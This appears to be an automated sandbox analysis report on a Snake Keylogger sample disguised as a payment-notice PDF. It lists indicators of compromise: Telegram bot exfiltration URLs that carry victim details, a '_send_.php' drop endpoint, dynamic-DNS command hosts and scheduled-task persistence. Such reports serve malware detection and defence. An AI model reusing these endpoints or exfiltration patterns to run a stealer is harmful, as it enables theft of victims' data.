                http://checkip.dyndns.org/q0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                awaratrendz.com
                119.18.54.39
                truetrueunknown
                reallyfreegeoip.org
                188.114.96.3
                truetrueunknown
                api.telegram.org
                149.154.167.220
                truetrueunknown
                checkip.dyndns.com
                193.122.130.0
                truefalseunknown
                checkip.dyndns.org
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                https://reallyfreegeoip.org/xml/8.46.123.33false
                • URL Reputation: safe
                unknown
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                  unknown
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/SOFcFE.exe, 00000014.00000002.3763196888.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://duckduckgo.com/chrome_newtabGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/ac/?q=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://api.telegram.org/botGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://www.office.com/lBGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://checkip.dyndns.orgGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20aGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://chrome.google.com/webstore?hl=enSOFcFE.exe, 00000014.00000002.3763196888.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F14000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.ecosia.org/newtab/GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://varders.kozow.com:8081GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://aborters.duckdns.org:8081GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    unknown
                                    https://ac.ecosia.org/autocomplete?q=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://51.38.247.67:8081/_send_.php?LGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/8.46.123.33$GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://anotherarmy.dns.army:8081GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://checkip.dyndns.org/qGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://chrome.google.com/webstore?hl=enlBGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://reallyfreegeoip.orgGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1451353095.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://awaratrendz.comGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedGeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://reallyfreegeoip.org/xml/GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        132.226.8.169
                                        unknownUnited States
                                        16989UTMEMUSfalse
                                        149.154.167.220
                                        api.telegram.orgUnited Kingdom
                                        62041TELEGRAMRUtrue
                                        119.18.54.39
                                        awaratrendz.comIndia
                                        394695PUBLIC-DOMAIN-REGISTRYUStrue
                                        188.114.96.3
                                        reallyfreegeoip.orgEuropean Union
                                        13335CLOUDFLARENETUStrue
                                        193.122.130.0
                                        checkip.dyndns.comUnited States
                                        31898ORACLE-BMC-31898USfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1524790
                                        Start date and time:2024-10-03 09:15:21 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 10m 57s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:25
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@5/5
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 198
                                        • Number of non-executed functions: 54
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target GeriOdemeBildirimi942.rar.xlxs.pdf.exe, PID 7220 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        TimeTypeDescription
                                        03:16:21API Interceptor6674404x Sleep call for process: GeriOdemeBildirimi942.rar.xlxs.pdf.exe modified
                                        03:16:25API Interceptor58x Sleep call for process: powershell.exe modified
                                        03:16:30API Interceptor4337383x Sleep call for process: SOFcFE.exe modified
                                        09:16:27Task SchedulerRun new task: SOFcFE path: C:\Users\user\AppData\Roaming\SOFcFE.exe
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        132.226.8.169Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SWIFT_COPY_-024-172700818106527.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        149.154.167.22008(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                          Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            reallyfreegeoip.orgHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            checkip.dyndns.comHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.8.169
                                                            Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            awaratrendz.comDekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 119.18.54.39
                                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 119.18.54.39
                                                            api.telegram.org08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 149.154.167.220
                                                            SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 149.154.167.220
                                                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRU08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 149.154.167.220
                                                            tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                            • 149.154.167.99
                                                            SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 149.154.167.220
                                                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            UTMEMUSHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            FACTURAS DE PAGOS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            hesaphareketi-01.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            PUBLIC-DOMAIN-REGISTRYUSPO23100070.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 199.79.62.115
                                                            grace.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.176
                                                            Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 208.91.199.223
                                                            http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                            • 103.21.58.228
                                                            RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.176
                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 119.18.54.39
                                                            http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalariGet hashmaliciousUnknownBrowse
                                                            • 162.222.225.80
